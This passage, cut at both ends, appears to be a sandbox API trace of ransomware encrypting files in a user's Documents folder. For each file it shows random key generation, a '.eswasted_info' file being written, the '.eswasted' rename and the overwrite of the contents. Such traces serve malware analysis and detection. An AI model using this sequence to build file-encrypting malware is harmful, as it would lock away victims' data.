pbBuffer=0x111fb48) returned 1 [0076.201] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.209] SetEndOfFile (hFile=0xfc) returned 1 [0076.211] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.211] CloseHandle (hObject=0xfc) returned 1 [0076.213] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0076.213] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f1c98 | out: hHeap=0x4a0000) returned 1 [0076.213] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0076.214] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0076.214] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gqoN37jdttg5MIy_.pptx") returned 65 [0076.214] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28c) returned 0x4e1ab8 [0076.214] lstrcpyW (in: lpString1=0x4e1b3a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.214] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.214] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0076.215] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.215] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gqoN37jdttg5MIy_.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gqon37jdttg5miy_.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.215] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.216] SetEndOfFile (hFile=0xfc) returned 1 [0076.216] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.216] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.216] lstrcpyW (in: lpString1=0x4e1b3a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gqoN37jdttg5MIy_.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gqon37jdttg5miy_.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gqoN37jdttg5MIy_.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gqon37jdttg5miy_.pptx.eswasted")) returned 1 [0076.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\gqoN37jdttg5MIy_.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gqon37jdttg5miy_.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.217] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0076.217] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x43b5 [0076.217] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x43b5) returned 0x2d0000 [0076.217] CloseHandle (hObject=0x120) returned 1 [0076.269] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0076.269] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0076.270] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.270] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.270] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0076.271] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0076.271] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.282] SetEndOfFile (hFile=0xfc) returned 1 [0076.284] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.284] CloseHandle (hObject=0xfc) returned 1 [0076.286] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0076.286] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f1d80 | out: hHeap=0x4a0000) returned 1 [0076.286] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0076.287] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0076.287] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.287] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IozVn1V1tovWF9k.xlsx") returned 64 [0076.287] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28a) returned 0x4e1ab8 [0076.287] lstrcpyW (in: lpString1=0x4e1b38, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.287] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.287] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0076.288] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.288] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IozVn1V1tovWF9k.xlsx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iozvn1v1tovwf9k.xlsx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.288] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.289] SetEndOfFile (hFile=0xfc) returned 1 [0076.290] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.290] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.290] lstrcpyW (in: lpString1=0x4e1b38, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IozVn1V1tovWF9k.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iozvn1v1tovwf9k.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IozVn1V1tovWF9k.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iozvn1v1tovwf9k.xlsx.eswasted")) returned 1 [0076.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\IozVn1V1tovWF9k.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iozvn1v1tovwf9k.xlsx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0076.290] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0076.291] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x9d4e [0076.291] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9d4e) returned 0x2d0000 [0076.291] CloseHandle (hObject=0x110) returned 1 [0076.294] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0076.294] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0076.295] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.295] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.295] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0076.295] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0076.295] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.304] SetEndOfFile (hFile=0xfc) returned 1 [0076.306] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.306] CloseHandle (hObject=0xfc) returned 1 [0076.308] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0076.308] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec298 | out: hHeap=0x4a0000) returned 1 [0076.308] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0076.309] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0076.309] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.309] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXfJy 7IJi8x1aQ.xls") returned 63 [0076.309] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x288) returned 0x4e1ab8 [0076.309] lstrcpyW (in: lpString1=0x4e1b36, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.309] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.309] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0076.309] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.310] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXfJy 7IJi8x1aQ.xls.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixfjy 7iji8x1aq.xls.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.310] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.311] SetEndOfFile (hFile=0xfc) returned 1 [0076.436] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.436] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.436] lstrcpyW (in: lpString1=0x4e1b36, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.436] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXfJy 7IJi8x1aQ.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixfjy 7iji8x1aq.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXfJy 7IJi8x1aQ.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixfjy 7iji8x1aq.xls.eswasted")) returned 1 [0076.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iXfJy 7IJi8x1aQ.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ixfjy 7iji8x1aq.xls.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.437] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0076.437] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x6e3f [0076.437] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e3f) returned 0x2d0000 [0076.437] CloseHandle (hObject=0x120) returned 1 [0076.440] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0076.441] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.441] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.441] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0076.441] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0076.441] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.450] SetEndOfFile (hFile=0xfc) returned 1 [0076.452] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.452] CloseHandle (hObject=0xfc) returned 1 [0076.453] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0076.454] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f1f48 | out: hHeap=0x4a0000) returned 1 [0076.454] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0076.455] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0076.455] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.455] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0076.455] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x29c) returned 0x4e1ab8 [0076.455] lstrcpyW (in: lpString1=0x4e1b4a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.455] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.455] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0076.456] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.456] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.456] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.458] SetEndOfFile (hFile=0xfc) returned 1 [0076.458] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.458] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.458] lstrcpyW (in: lpString1=0x4e1b4a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.458] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.eswasted")) returned 1 [0076.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0076.593] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0076.594] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x74e6 [0076.594] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x74e6) returned 0x2d0000 [0076.594] CloseHandle (hObject=0x110) returned 1 [0076.603] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0076.604] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.604] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.604] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0076.605] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0076.605] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.743] SetEndOfFile (hFile=0xfc) returned 1 [0076.745] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.745] CloseHandle (hObject=0xfc) returned 1 [0076.746] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0076.746] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e16d8 | out: hHeap=0x4a0000) returned 1 [0076.747] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0076.747] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0076.747] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.747] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PgChU9H2N19O0juNS3v.xlsx") returned 68 [0076.748] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x292) returned 0x4e1ab8 [0076.748] lstrcpyW (in: lpString1=0x4e1b40, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0076.748] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0076.748] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0076.748] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0076.748] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PgChU9H2N19O0juNS3v.xlsx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pgchu9h2n19o0juns3v.xlsx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.759] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0076.760] SetEndOfFile (hFile=0xfc) returned 1 [0076.760] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.760] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.760] lstrcpyW (in: lpString1=0x4e1b40, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0076.760] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PgChU9H2N19O0juNS3v.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pgchu9h2n19o0juns3v.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PgChU9H2N19O0juNS3v.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pgchu9h2n19o0juns3v.xlsx.eswasted")) returned 1 [0076.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PgChU9H2N19O0juNS3v.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pgchu9h2n19o0juns3v.xlsx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0076.761] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0076.762] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x143c1 [0076.762] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x143c1) returned 0xb10000 [0076.762] CloseHandle (hObject=0x120) returned 1 [0076.766] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0076.767] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0076.767] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.767] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0076.768] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0076.768] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0076.776] SetEndOfFile (hFile=0xfc) returned 1 [0076.779] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0076.779] CloseHandle (hObject=0xfc) returned 1 [0076.786] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0076.786] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd598 | out: hHeap=0x4a0000) returned 1 [0076.786] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0076.787] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, 